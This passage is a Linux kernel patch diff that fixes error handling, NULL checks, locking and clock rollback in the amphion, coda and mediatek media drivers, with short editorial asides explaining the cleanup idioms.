+diff --git a/drivers/media/platform/amphion/vpu_drv.c b/drivers/media/platform/amphion/vpu_drv.c
+index 9d5a5075343d3..f01ce49d27e80 100644
+--- a/drivers/media/platform/amphion/vpu_drv.c
++++ b/drivers/media/platform/amphion/vpu_drv.c
+@@ -245,7 +245,11 @@ static int __init vpu_driver_init(void)
+ 	if (ret)
+ 		return ret;
+ 
+-	return vpu_core_driver_init();
++	ret = vpu_core_driver_init();
++	if (ret)
++		platform_driver_unregister(&amphion_vpu_driver);
++
++	return ret;
+ }
+ 
+ static void __exit vpu_driver_exit(void)
+diff --git a/drivers/media/platform/amphion/vpu_malone.c b/drivers/media/platform/amphion/vpu_malone.c
+index 51e0702f9ae17..9f2890730fd70 100644
+--- a/drivers/media/platform/amphion/vpu_malone.c
++++ b/drivers/media/platform/amphion/vpu_malone.c
+@@ -692,6 +692,7 @@ int vpu_malone_set_decode_params(struct vpu_shared_addr *shared,
+ }
+ 
+ static struct vpu_pair malone_cmds[] = {
++	{VPU_CMD_ID_NOOP, VID_API_CMD_NULL},
+ 	{VPU_CMD_ID_START, VID_API_CMD_START},
+ 	{VPU_CMD_ID_STOP, VID_API_CMD_STOP},
+ 	{VPU_CMD_ID_ABORT, VID_API_CMD_ABORT},
+diff --git a/drivers/media/platform/amphion/vpu_msgs.c b/drivers/media/platform/amphion/vpu_msgs.c
+index d8247f36d84ba..92672a802b492 100644
+--- a/drivers/media/platform/amphion/vpu_msgs.c
++++ b/drivers/media/platform/amphion/vpu_msgs.c
+@@ -43,6 +43,7 @@ static void vpu_session_handle_mem_request(struct vpu_inst *inst, struct vpu_rpc
+ 		  req_data.ref_frame_num,
+ 		  req_data.act_buf_size,
+ 		  req_data.act_buf_num);
++	vpu_inst_lock(inst);
+ 	call_void_vop(inst, mem_request,
+ 		      req_data.enc_frame_size,
+ 		      req_data.enc_frame_num,
+@@ -50,6 +51,7 @@ static void vpu_session_handle_mem_request(struct vpu_inst *inst, struct vpu_rpc
+ 		      req_data.ref_frame_num,
+ 		      req_data.act_buf_size,
+ 		      req_data.act_buf_num);
++	vpu_inst_unlock(inst);
+ }
+ 
+ static void vpu_session_handle_stop_done(struct vpu_inst *inst, struct vpu_rpc_event *pkt)
+diff --git a/drivers/media/platform/amphion/vpu_v4l2.c b/drivers/media/platform/amphion/vpu_v4l2.c
+index b779e0ba916ca..590d1084e5a5d 100644
+--- a/drivers/media/platform/amphion/vpu_v4l2.c
++++ b/drivers/media/platform/amphion/vpu_v4l2.c
+@@ -65,18 +65,11 @@ unsigned int vpu_get_buffer_state(struct vb2_v4l2_buffer *vbuf)
+ 
+ void vpu_v4l2_set_error(struct vpu_inst *inst)
+ {
+-	struct vb2_queue *src_q;
+-	struct vb2_queue *dst_q;
+-
+ 	vpu_inst_lock(inst);
+ 	dev_err(inst->dev, "some error occurs in codec\n");
+ 	if (inst->fh.m2m_ctx) {
+-		src_q = v4l2_m2m_get_src_vq(inst->fh.m2m_ctx);
+-		dst_q = v4l2_m2m_get_dst_vq(inst->fh.m2m_ctx);
+-		src_q->error = 1;
+-		dst_q->error = 1;
+-		wake_up(&src_q->done_wq);
+-		wake_up(&dst_q->done_wq);
++		vb2_queue_error(v4l2_m2m_get_src_vq(inst->fh.m2m_ctx));
++		vb2_queue_error(v4l2_m2m_get_dst_vq(inst->fh.m2m_ctx));
+ 	}
+ 	vpu_inst_unlock(inst);
+ }
+@@ -249,8 +242,12 @@ int vpu_process_capture_buffer(struct vpu_inst *inst)
+ 
+ struct vb2_v4l2_buffer *vpu_next_src_buf(struct vpu_inst *inst)
+ {
+-	struct vb2_v4l2_buffer *src_buf = v4l2_m2m_next_src_buf(inst->fh.m2m_ctx);
++	struct vb2_v4l2_buffer *src_buf = NULL;
++
++	if (!inst->fh.m2m_ctx)
++		return NULL;
+ 
++	src_buf = v4l2_m2m_next_src_buf(inst->fh.m2m_ctx);
+ 	if (!src_buf || vpu_get_buffer_state(src_buf) == VPU_BUF_STATE_IDLE)
+ 		return NULL;
+ 
+@@ -273,7 +270,7 @@ void vpu_skip_frame(struct vpu_inst *inst, int count)
+ 	enum vb2_buffer_state state;
+ 	int i = 0;
+ 
+-	if (count <= 0)
++	if (count <= 0 || !inst->fh.m2m_ctx)
+ 		return;
+ 
+ 	while (i < count) {
+@@ -603,10 +600,6 @@ static int vpu_v4l2_release(struct vpu_inst *inst)
+ 		inst->workqueue = NULL;
+ 	}
+ 
+-	if (inst->fh.m2m_ctx) {
+-		v4l2_m2m_ctx_release(inst->fh.m2m_ctx);
+-		inst->fh.m2m_ctx = NULL;
+-	}
+ 	v4l2_ctrl_handler_free(&inst->ctrl_handler);
+ 	mutex_destroy(&inst->lock);
+ 	v4l2_fh_del(&inst->fh);
+@@ -689,6 +682,13 @@ int vpu_v4l2_close(struct file *file)
+ 
+ 	vpu_trace(vpu->dev, "tgid = %d, pid = %d, inst = %p\n", inst->tgid, inst->pid, inst);
+ 
++	vpu_inst_lock(inst);
++	if (inst->fh.m2m_ctx) {
++		v4l2_m2m_ctx_release(inst->fh.m2m_ctx);
++		inst->fh.m2m_ctx = NULL;
++	}
++	vpu_inst_unlock(inst);
++
+ 	call_void_vop(inst, release);
+ 	vpu_inst_unregister(inst);
+ 	vpu_inst_put(inst);
+diff --git a/drivers/media/platform/amphion/vpu_windsor.c b/drivers/media/platform/amphion/vpu_windsor.c
+index 1526af2ef9da4..b93c8cfdee7f5 100644
+--- a/drivers/media/platform/amphion/vpu_windsor.c
++++ b/drivers/media/platform/amphion/vpu_windsor.c
+@@ -658,6 +658,7 @@ int vpu_windsor_get_stream_buffer_size(struct vpu_shared_addr *shared)
+ }
+ 
+ static struct vpu_pair windsor_cmds[] = {
++	{VPU_CMD_ID_NOOP, GTB_ENC_CMD_NOOP},
+ 	{VPU_CMD_ID_CONFIGURE_CODEC, GTB_ENC_CMD_CONFIGURE_CODEC},
+ 	{VPU_CMD_ID_START, GTB_ENC_CMD_STREAM_START},
+ 	{VPU_CMD_ID_STOP, GTB_ENC_CMD_STREAM_STOP},
+diff --git a/drivers/media/platform/chips-media/coda-bit.c b/drivers/media/platform/chips-media/coda-bit.c
+index 2736a902e3df3..ed47d5bd8d61e 100644
+--- a/drivers/media/platform/chips-media/coda-bit.c
++++ b/drivers/media/platform/chips-media/coda-bit.c
+@@ -854,7 +854,7 @@ static void coda_setup_iram(struct coda_ctx *ctx)
+ 		/* Only H.264BP and H.263P3 are considered */
+ 		iram_info->buf_dbk_y_use = coda_iram_alloc(iram_info, w64);
+ 		iram_info->buf_dbk_c_use = coda_iram_alloc(iram_info, w64);
+-		if (!iram_info->buf_dbk_c_use)
++		if (!iram_info->buf_dbk_y_use || !iram_info->buf_dbk_c_use)
+ 			goto out;
+ 		iram_info->axi_sram_use |= dbk_bits;
+ 
+@@ -878,7 +878,7 @@ static void coda_setup_iram(struct coda_ctx *ctx)
+ 
+ 		iram_info->buf_dbk_y_use = coda_iram_alloc(iram_info, w128);
+ 		iram_info->buf_dbk_c_use = coda_iram_alloc(iram_info, w128);
+-		if (!iram_info->buf_dbk_c_use)
++		if (!iram_info->buf_dbk_y_use || !iram_info->buf_dbk_c_use)
+ 			goto out;
+ 		iram_info->axi_sram_use |= dbk_bits;
+ 
+@@ -1084,10 +1084,16 @@ static int coda_start_encoding(struct coda_ctx *ctx)
+ 	}
+ 
+ 	if (dst_fourcc == V4L2_PIX_FMT_JPEG) {
+-		if (!ctx->params.jpeg_qmat_tab[0])
++		if (!ctx->params.jpeg_qmat_tab[0]) {
+ 			ctx->params.jpeg_qmat_tab[0] = kmalloc(64, GFP_KERNEL);
+-		if (!ctx->params.jpeg_qmat_tab[1])
++			if (!ctx->params.jpeg_qmat_tab[0])
++				return -ENOMEM;
++		}
++		if (!ctx->params.jpeg_qmat_tab[1]) {
+ 			ctx->params.jpeg_qmat_tab[1] = kmalloc(64, GFP_KERNEL);
++			if (!ctx->params.jpeg_qmat_tab[1])
++				return -ENOMEM;
++		}
+ 		coda_set_jpeg_compression_quality(ctx, ctx->params.jpeg_quality);
+ 	}
+ 
+diff --git a/drivers/media/platform/chips-media/coda-jpeg.c b/drivers/media/platform/chips-media/coda-jpeg.c
+index 435e7030fc2a8..ba8f410029172 100644
+--- a/drivers/media/platform/chips-media/coda-jpeg.c
++++ b/drivers/media/platform/chips-media/coda-jpeg.c
+@@ -1052,10 +1052,16 @@ static int coda9_jpeg_start_encoding(struct coda_ctx *ctx)
+ 		v4l2_err(&dev->v4l2_dev, "error loading Huffman tables\n");
+ 		return ret;
+ 	}
+-	if (!ctx->params.jpeg_qmat_tab[0])
++	if (!ctx->params.jpeg_qmat_tab[0]) {
+ 		ctx->params.jpeg_qmat_tab[0] = kmalloc(64, GFP_KERNEL);
+-	if (!ctx->params.jpeg_qmat_tab[1])
++		if (!ctx->params.jpeg_qmat_tab[0])
++			return -ENOMEM;
++	}
++	if (!ctx->params.jpeg_qmat_tab[1]) {
+ 		ctx->params.jpeg_qmat_tab[1] = kmalloc(64, GFP_KERNEL);
++		if (!ctx->params.jpeg_qmat_tab[1])
++			return -ENOMEM;
++	}
+ 	coda_set_jpeg_compression_quality(ctx, ctx->params.jpeg_quality);
+ 
+ 	return 0;
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-cmdq.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-cmdq.c
+index 86c054600a08c..124c1b96e96bd 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-cmdq.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-cmdq.c
+@@ -252,10 +252,9 @@ static int mdp_cmdq_pkt_create(struct cmdq_client *client, struct cmdq_pkt *pkt,
+ 	dma_addr_t dma_addr;
+ 
+ 	pkt->va_base = kzalloc(size, GFP_KERNEL);
+-	if (!pkt->va_base) {
+-		kfree(pkt);
++	if (!pkt->va_base)
+ 		return -ENOMEM;
+-	}
++
+ 	pkt->buf_size = size;
+ 	pkt->cl = (void *)client;
+ 
+@@ -368,25 +367,30 @@ int mdp_cmdq_send(struct mdp_dev *mdp, struct mdp_cmdq_param *param)
+ 	cmd = kzalloc(sizeof(*cmd), GFP_KERNEL);
+ 	if (!cmd) {
+ 		ret = -ENOMEM;
+-		goto err_cmdq_data;
++		goto err_cancel_job;
+ 	}
+ 
+-	if (mdp_cmdq_pkt_create(mdp->cmdq_clt, &cmd->pkt, SZ_16K)) {
+-		ret = -ENOMEM;
+-		goto err_cmdq_data;
+-	}
++	ret = mdp_cmdq_pkt_create(mdp->cmdq_clt, &cmd->pkt, SZ_16K);
++	if (ret)
++		goto err_free_cmd;
+ 
+ 	comps = kcalloc(param->config->num_components, sizeof(*comps),
+ 			GFP_KERNEL);
+ 	if (!comps) {
+ 		ret = -ENOMEM;
+-		goto err_cmdq_data;
++		goto err_destroy_pkt;
+ 	}
+ 
+ 	path = kzalloc(sizeof(*path), GFP_KERNEL);
+ 	if (!path) {
+ 		ret = -ENOMEM;
+-		goto err_cmdq_data;
++		goto err_free_comps;
++	}
++
++	ret = mtk_mutex_prepare(mdp->mdp_mutex[MDP_PIPE_RDMA0]);
++	if (ret) {
++		dev_err(dev, "Fail to enable mutex clk\n");
++		goto err_free_path;
+ 	}
+ 
+ 	path->mdp_dev = mdp;
+@@ -406,15 +410,13 @@ int mdp_cmdq_send(struct mdp_dev *mdp, struct mdp_cmdq_param *param)
+ 	ret = mdp_path_ctx_init(mdp, path);
+ 	if (ret) {
+ 		dev_err(dev, "mdp_path_ctx_init error\n");
+-		goto err_cmdq_data;
++		goto err_free_path;
+ 	}
+ 
+-	mtk_mutex_prepare(mdp->mdp_mutex[MDP_PIPE_RDMA0]);
+-
+ 	ret = mdp_path_config(mdp, cmd, path);
+ 	if (ret) {
+ 		dev_err(dev, "mdp_path_config error\n");
+-		goto err_cmdq_data;
++		goto err_free_path;
+ 	}
+ 	cmdq_pkt_finalize(&cmd->pkt);
+ 
+@@ -431,10 +433,8 @@ int mdp_cmdq_send(struct mdp_dev *mdp, struct mdp_cmdq_param *param)
+ 	cmd->mdp_ctx = param->mdp_ctx;
+ 
+ 	ret = mdp_comp_clocks_on(&mdp->pdev->dev, cmd->comps, cmd->num_comps);
+-	if (ret) {
+-		dev_err(dev, "comp %d failed to enable clock!\n", ret);
+-		goto err_clock_off;
+-	}
++	if (ret)
++		goto err_free_path;
+ 
+ 	dma_sync_single_for_device(mdp->cmdq_clt->chan->mbox->dev,
+ 				   cmd->pkt.pa_base, cmd->pkt.cmd_buf_size,
+@@ -450,17 +450,20 @@ int mdp_cmdq_send(struct mdp_dev *mdp, struct mdp_cmdq_param *param)
+ 	return 0;
+ 
+ err_clock_off:
+-	mtk_mutex_unprepare(mdp->mdp_mutex[MDP_PIPE_RDMA0]);
+ 	mdp_comp_clocks_off(&mdp->pdev->dev, cmd->comps,
+ 			    cmd->num_comps);
+-err_cmdq_data:
++err_free_path:
++	mtk_mutex_unprepare(mdp->mdp_mutex[MDP_PIPE_RDMA0]);
+ 	kfree(path);
+-	atomic_dec(&mdp->job_count);
+-	wake_up(&mdp->callback_wq);
+-	if (cmd && cmd->pkt.buf_size > 0)
+-		mdp_cmdq_pkt_destroy(&cmd->pkt);
++err_free_comps:
+ 	kfree(comps);
++err_destroy_pkt:
++	mdp_cmdq_pkt_destroy(&cmd->pkt);
++err_free_cmd:
+ 	kfree(cmd);
++err_cancel_job:
++	atomic_dec(&mdp->job_count);
++
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(mdp_cmdq_send);
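
[Editorial aside, not part of the patch] The reworked mdp_cmdq_send() error path above follows the kernel's goto-unwind idiom: one label per acquired resource, released in reverse order of acquisition, so each failure site jumps to exactly the cleanup it still needs. Below is a minimal userspace sketch of the same shape, assuming nothing beyond libc; all names are invented stand-ins for the kernel allocations.

/* Minimal sketch of the goto-unwind idiom; names are invented. */
#include <stdio.h>
#include <stdlib.h>

static int demo_send(size_t size)
{
	char *cmd, *pkt, *comps;
	int ret = -1;

	cmd = malloc(size);		/* stands in for kzalloc(cmd) */
	if (!cmd)
		return -1;

	pkt = malloc(size);		/* stands in for mdp_cmdq_pkt_create() */
	if (!pkt)
		goto err_free_cmd;

	comps = malloc(size);		/* stands in for kcalloc(comps) */
	if (!comps)
		goto err_free_pkt;

	/* ... work with cmd/pkt/comps ... */

	free(comps);
	free(pkt);
	free(cmd);
	return 0;

err_free_pkt:
	free(pkt);
err_free_cmd:
	free(cmd);
	return ret;
}

int main(void)
{
	printf("demo_send: %d\n", demo_send(64));
	return 0;
}

The invariant the patch restores is that every label releases only what was successfully acquired before the failing step.
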
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-comp.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-comp.c
+index d3eaf8884412d..7bc05f42a23c1 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-comp.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-comp.c
+@@ -699,12 +699,22 @@ int mdp_comp_clock_on(struct device *dev, struct mdp_comp *comp)
+ 			dev_err(dev,
+ 				"Failed to enable clk %d. type:%d id:%d\n",
+ 				i, comp->type, comp->id);
+-			pm_runtime_put(comp->comp_dev);
+-			return ret;
++			goto err_revert;
+ 		}
+ 	}
+ 
+ 	return 0;
++
++err_revert:
++	while (--i >= 0) {
++		if (IS_ERR_OR_NULL(comp->clks[i]))
++			continue;
++		clk_disable_unprepare(comp->clks[i]);
++	}
++	if (comp->comp_dev)
++		pm_runtime_put_sync(comp->comp_dev);
++
++	return ret;
+ }
+ 
+ void mdp_comp_clock_off(struct device *dev, struct mdp_comp *comp)
+@@ -723,11 +733,13 @@ void mdp_comp_clock_off(struct device *dev, struct mdp_comp *comp)
+ 
+ int mdp_comp_clocks_on(struct device *dev, struct mdp_comp *comps, int num)
+ {
+-	int i;
++	int i, ret;
+ 
+-	for (i = 0; i < num; i++)
+-		if (mdp_comp_clock_on(dev, &comps[i]) != 0)
+-			return ++i;
++	for (i = 0; i < num; i++) {
++		ret = mdp_comp_clock_on(dev, &comps[i]);
++		if (ret)
++			return ret;
++	}
+ 
+ 	return 0;
+ }
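
[Editorial aside, not part of the patch] mdp_comp_clock_on() now rolls back the clocks it already enabled before propagating the error, instead of leaving them running. A hedged sketch of that while (--i >= 0) rollback pattern, with malloc()/free() standing in for clk_prepare_enable()/clk_disable_unprepare():

/* Rollback of partially-enabled resources; malloc stands in for clocks. */
#include <stdio.h>
#include <stdlib.h>

#define NUM_RES 4

static int enable_all(char *res[], int num)
{
	int i;

	for (i = 0; i < num; i++) {
		res[i] = malloc(32);	/* stands in for clk_prepare_enable() */
		if (!res[i])
			goto err_revert;
	}
	return 0;

err_revert:
	/* Undo only what actually succeeded, in reverse order. */
	while (--i >= 0)
		free(res[i]);		/* stands in for clk_disable_unprepare() */
	return -1;
}

int main(void)
{
	char *res[NUM_RES];
	int i;

	if (enable_all(res, NUM_RES) == 0) {
		for (i = NUM_RES - 1; i >= 0; i--)
			free(res[i]);
		puts("enabled and released cleanly");
	}
	return 0;
}
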
+diff --git a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
+index c413e59d42860..2d1f6ae9f0802 100644
+--- a/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
++++ b/drivers/media/platform/mediatek/mdp3/mtk-mdp3-core.c
+@@ -196,27 +196,27 @@ static int mdp_probe(struct platform_device *pdev)
+ 	mm_pdev = __get_pdev_by_id(pdev, MDP_INFRA_MMSYS);
+ 	if (!mm_pdev) {
+ 		ret = -ENODEV;
+-		goto err_return;
++		goto err_destroy_device;
+ 	}
+ 	mdp->mdp_mmsys = &mm_pdev->dev;
+ 
+ 	mm_pdev = __get_pdev_by_id(pdev, MDP_INFRA_MUTEX);
+ 	if (WARN_ON(!mm_pdev)) {
+ 		ret = -ENODEV;
+-		goto err_return;
++		goto err_destroy_device;
+ 	}
+ 	for (i = 0; i < MDP_PIPE_MAX; i++) {
+ 		mdp->mdp_mutex[i] = mtk_mutex_get(&mm_pdev->dev);
+ 		if (!mdp->mdp_mutex[i]) {
+ 			ret = -ENODEV;
+-			goto err_return;
++			goto err_free_mutex;
+ 		}
+ 	}
+ 
+ 	ret = mdp_comp_config(mdp);
+ 	if (ret) {
+ 		dev_err(dev, "Failed to config mdp components\n");
+-		goto err_return;
++		goto err_free_mutex;
+ 	}
+ 
+ 	mdp->job_wq = alloc_workqueue(MDP_MODULE_NAME, WQ_FREEZABLE, 0);
+@@ -287,11 +287,12 @@ err_destroy_job_wq:
+ 	destroy_workqueue(mdp->job_wq);
+ err_deinit_comp:
+ 	mdp_comp_destroy(mdp);
+-err_return:
++err_free_mutex:
+ 	for (i = 0; i < MDP_PIPE_MAX; i++)
+-		if (mdp)
+-			mtk_mutex_put(mdp->mdp_mutex[i]);
++		mtk_mutex_put(mdp->mdp_mutex[i]);
++err_destroy_device:
+ 	kfree(mdp);
++err_return:
+ 	dev_dbg(dev, "Errno %d\n", ret);
+ 	return ret;
+ }
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
+index c45bd2599bb2d..ffbcee04dc26f 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateless.c
+@@ -138,10 +138,13 @@ static void mtk_vdec_stateless_cap_to_disp(struct mtk_vcodec_ctx *ctx, int error
+ 		state = VB2_BUF_STATE_DONE;
+ 
+ 	vb2_dst = v4l2_m2m_dst_buf_remove(ctx->m2m_ctx);
+-	v4l2_m2m_buf_done(vb2_dst, state);
+-
+-	mtk_v4l2_debug(2, "free frame buffer id:%d to done list",
+-		       vb2_dst->vb2_buf.index);
++	if (vb2_dst) {
++		v4l2_m2m_buf_done(vb2_dst, state);
++		mtk_v4l2_debug(2, "free frame buffer id:%d to done list",
++			       vb2_dst->vb2_buf.index);
++	} else {
++		mtk_v4l2_err("dst buffer is NULL");
++	}
+ 
+ 	if (src_buf_req)
+ 		v4l2_ctrl_request_complete(src_buf_req, &ctx->ctrl_hdl);
+@@ -250,7 +253,7 @@ static void mtk_vdec_worker(struct work_struct *work)
+ 
+ 	state = ret ? VB2_BUF_STATE_ERROR : VB2_BUF_STATE_DONE;
+ 	if (!IS_VDEC_LAT_ARCH(dev->vdec_pdata->hw_arch) ||
+-	    ctx->current_codec == V4L2_PIX_FMT_VP8_FRAME || ret) {
++	    ctx->current_codec == V4L2_PIX_FMT_VP8_FRAME) {
+ 		v4l2_m2m_buf_done_and_job_finish(dev->m2m_dev_dec, ctx->m2m_ctx, state);
+ 		if (src_buf_req)
+ 			v4l2_ctrl_request_complete(src_buf_req, &ctx->ctrl_hdl);
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c b/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
+index 4cc92700692b3..955b2d0c8f53f 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec/vdec_h264_req_multi_if.c
+@@ -471,14 +471,19 @@ static int vdec_h264_slice_core_decode(struct vdec_lat_buf *lat_buf)
+ 	       sizeof(share_info->h264_slice_params));
+ 
+ 	fb = ctx->dev->vdec_pdata->get_cap_buffer(ctx);
+-	y_fb_dma = fb ? (u64)fb->base_y.dma_addr : 0;
+-	vdec_fb_va = (unsigned long)fb;
++	if (!fb) {
++		err = -EBUSY;
++		mtk_vcodec_err(inst, "fb buffer is NULL");
++		goto vdec_dec_end;
++	}
+ 
++	vdec_fb_va = (unsigned long)fb;
++	y_fb_dma = (u64)fb->base_y.dma_addr;
+ 	if (ctx->q_data[MTK_Q_DATA_DST].fmt->num_planes == 1)
+ 		c_fb_dma =
+ 			y_fb_dma + inst->ctx->picinfo.buf_w * inst->ctx->picinfo.buf_h;
+ 	else
+-		c_fb_dma = fb ? (u64)fb->base_c.dma_addr : 0;
++		c_fb_dma = (u64)fb->base_c.dma_addr;
+ 
+ 	mtk_vcodec_debug(inst, "[h264-core] y/c addr = 0x%llx 0x%llx", y_fb_dma,
+ 			 c_fb_dma);
+@@ -539,6 +544,29 @@ vdec_dec_end:
+ 	return 0;
+ }
+ 
++static void vdec_h264_insert_startcode(struct mtk_vcodec_dev *vcodec_dev, unsigned char *buf,
++				       size_t *bs_size, struct mtk_h264_pps_param *pps)
++{
++	struct device *dev = &vcodec_dev->plat_dev->dev;
++
++	/* Need to append padding at the end of the bitstream when bs_sz is no
++	 * larger than 20 bytes for a CAVLC bitstream, or LAT decoding fails.
++	 * This padding is needed on the mt8192 and mt8195 platforms.
++	 *
++	 * The bitstream is CAVLC when entropy_coding_mode_flag is false.
++	 */
++	if (pps->entropy_coding_mode_flag || *bs_size > 20 ||
++	    !(of_device_is_compatible(dev->of_node, "mediatek,mt8192-vcodec-dec") ||
++	    of_device_is_compatible(dev->of_node, "mediatek,mt8195-vcodec-dec")))
++		return;
++
++	buf[*bs_size] = 0;
++	buf[*bs_size + 1] = 0;
++	buf[*bs_size + 2] = 1;
++	buf[*bs_size + 3] = 0xff;
++	(*bs_size) += 4;
++}
++
+ static int vdec_h264_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 				      struct vdec_fb *fb, bool *res_chg)
+ {
+@@ -582,9 +610,6 @@ static int vdec_h264_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	}
+ 
+ 	inst->vsi->dec.nal_info = buf[nal_start_idx];
+-	inst->vsi->dec.bs_buf_addr = (u64)bs->dma_addr;
+-	inst->vsi->dec.bs_buf_size = bs->size;
+-
+ 	lat_buf->src_buf_req = src_buf_info->m2m_buf.vb.vb2_buf.req_obj.req;
+ 	v4l2_m2m_buf_copy_metadata(&src_buf_info->m2m_buf.vb, &lat_buf->ts_info, true);
+ 
+@@ -592,6 +617,12 @@ static int vdec_h264_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	if (err)
+ 		goto err_free_fb_out;
+ 
++	vdec_h264_insert_startcode(inst->ctx->dev, buf, &bs->size,
++				   &share_info->h264_slice_params.pps);
++
++	inst->vsi->dec.bs_buf_addr = (uint64_t)bs->dma_addr;
++	inst->vsi->dec.bs_buf_size = bs->size;
++
+ 	*res_chg = inst->resolution_changed;
+ 	if (inst->resolution_changed) {
+ 		mtk_vcodec_debug(inst, "- resolution changed -");
+@@ -630,7 +661,7 @@ static int vdec_h264_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	err = vpu_dec_start(vpu, data, 2);
+ 	if (err) {
+ 		mtk_vcodec_debug(inst, "lat decode err: %d", err);
+-		goto err_scp_decode;
++		goto err_free_fb_out;
+ 	}
+ 
+ 	share_info->trans_end = inst->ctx->msg_queue.wdma_addr.dma_addr +
+@@ -647,12 +678,17 @@ static int vdec_h264_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	/* wait decoder done interrupt */
+ 	timeout = mtk_vcodec_wait_for_done_ctx(inst->ctx, MTK_INST_IRQ_RECEIVED,
+ 					       WAIT_INTR_TIMEOUT_MS, MTK_VDEC_LAT0);
++	if (timeout)
++		mtk_vcodec_err(inst, "lat decode timeout: pic_%d", inst->slice_dec_num);
+ 	inst->vsi->dec.timeout = !!timeout;
+ 
+ 	err = vpu_dec_end(vpu);
+-	if (err == SLICE_HEADER_FULL || timeout || err == TRANS_BUFFER_FULL) {
+-		err = -EINVAL;
+-		goto err_scp_decode;
++	if (err == SLICE_HEADER_FULL || err == TRANS_BUFFER_FULL) {
++		if (!IS_VDEC_INNER_RACING(inst->ctx->dev->dec_capability))
++			vdec_msg_queue_qbuf(&inst->ctx->msg_queue.lat_ctx, lat_buf);
++		inst->slice_dec_num++;
++		mtk_vcodec_err(inst, "lat dec fail: pic_%d err:%d", inst->slice_dec_num, err);
++		return -EINVAL;
+ 	}
+ 
+ 	share_info->trans_end = inst->ctx->msg_queue.wdma_addr.dma_addr +
+@@ -669,10 +705,6 @@ static int vdec_h264_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 
+ 	inst->slice_dec_num++;
+ 	return 0;
+-
+-err_scp_decode:
+-	if (!IS_VDEC_INNER_RACING(inst->ctx->dev->dec_capability))
+-		vdec_msg_queue_qbuf(&inst->ctx->msg_queue.lat_ctx, lat_buf);
+ err_free_fb_out:
+ 	vdec_msg_queue_qbuf(&inst->ctx->msg_queue.lat_ctx, lat_buf);
+ 	mtk_vcodec_err(inst, "slice dec number: %d err: %d", inst->slice_dec_num, err);
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c b/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
+index fb1c36a3592d1..cbb6728b8a40b 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec/vdec_vp9_req_lat_if.c
+@@ -2073,21 +2073,23 @@ static int vdec_vp9_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 		return -EBUSY;
+ 	}
+ 	pfc = (struct vdec_vp9_slice_pfc *)lat_buf->private_data;
+-	if (!pfc)
+-		return -EINVAL;
++	if (!pfc) {
++		ret = -EINVAL;
++		goto err_free_fb_out;
++	}
+ 	vsi = &pfc->vsi;
+ 
+ 	ret = vdec_vp9_slice_setup_lat(instance, bs, lat_buf, pfc);
+ 	if (ret) {
+ 		mtk_vcodec_err(instance, "Failed to setup VP9 lat ret %d\n", ret);
+-		return ret;
++		goto err_free_fb_out;
+ 	}
+ 	vdec_vp9_slice_vsi_to_remote(vsi, instance->vsi);
+ 
+ 	ret = vpu_dec_start(&instance->vpu, NULL, 0);
+ 	if (ret) {
+ 		mtk_vcodec_err(instance, "Failed to dec VP9 ret %d\n", ret);
+-		return ret;
++		goto err_free_fb_out;
+ 	}
+ 
+ 	if (instance->irq) {
+@@ -2107,7 +2109,7 @@ static int vdec_vp9_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	/* LAT trans full, no more UBE or decode timeout */
+ 	if (ret) {
+ 		mtk_vcodec_err(instance, "VP9 decode error: %d\n", ret);
+-		return ret;
++		goto err_free_fb_out;
+ 	}
+ 
+ 	mtk_vcodec_debug(instance, "lat dma addr: 0x%lx 0x%lx\n",
+@@ -2120,6 +2122,9 @@ static int vdec_vp9_slice_lat_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+ 	vdec_msg_queue_qbuf(&ctx->dev->msg_queue_core_ctx, lat_buf);
+ 
+ 	return 0;
++err_free_fb_out:
++	vdec_msg_queue_qbuf(&ctx->msg_queue.lat_ctx, lat_buf);
++	return ret;
+ }
+ 
+ static int vdec_vp9_slice_decode(void *h_vdec, struct mtk_vcodec_mem *bs,
+diff --git a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+index ae500980ad45c..dc2004790a472 100644
+--- a/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
++++ b/drivers/media/platform/mediatek/vcodec/vdec_msg_queue.c
+@@ -221,7 +221,7 @@ static void vdec_msg_queue_core_work(struct work_struct *work)
+ 	mtk_vcodec_dec_disable_hardware(ctx, MTK_VDEC_CORE);
+ 	vdec_msg_queue_qbuf(&ctx->msg_queue.lat_ctx, lat_buf);
+ 
+-	if (!list_empty(&ctx->msg_queue.lat_ctx.ready_queue)) {
